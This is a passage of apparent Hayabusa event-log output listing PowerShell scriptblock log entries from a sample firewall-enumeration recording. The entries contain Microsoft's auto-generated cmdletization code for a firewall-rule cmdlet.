[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = 